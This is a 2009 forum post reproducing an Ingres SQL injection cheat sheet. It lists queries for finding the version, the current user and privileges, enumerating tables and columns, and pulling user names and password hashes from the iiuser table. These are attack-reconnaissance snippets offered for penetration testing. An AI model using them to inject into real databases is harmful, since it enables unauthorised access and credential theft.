Ingres SQL Injection Cheat Sheet

Nytro · November 10, 2009

Version

select dbmsinfo('_version');

Comments

SELECT 123; -- comment

select 123; /* comment */

Current User

select dbmsinfo('session_user');

select dbmsinfo('system_user');

List Users

First connect to iidbdb, then:

select name, password from iiuser;

List Password Hashes

First connect to iidbdb, then:

select name, password from iiuser;

List Privileges

select dbmsinfo('db_admin');

select dbmsinfo('create_table');

select dbmsinfo('create_procedure');

select dbmsinfo('security_priv');

select dbmsinfo('select_syscat');

select dbmsinfo('db_privileges');

select dbmsinfo('current_priv_mask');

Current Database

select dbmsinfo('database');

List Columns

select column_name, column_datatype, table_name, table_owner from iicolumns;

List Tables

select table_name, table_owner from iitables;

select relid, relowner, relloc from iirelation;

select relid, relowner, relloc from iirelation where relowner != '$ingres';

Select Nth Row

Astoundingly, this doesn't seem to be possible! This is as close as you can get:

select top 10 blah from table;

select first 10 blah form table;

Select Nth Char

select substr('abc', 2, 1); -- returns 'b'

Casting

select cast(123 as varchar);

select cast('123' as integer);

String Concatenation

select 'abc' || 'def';

Sign In

Ingres SQL Injection Cheat Sheet

Recommended Posts

Nytro

Join the conversation

Browse

Activity

Pages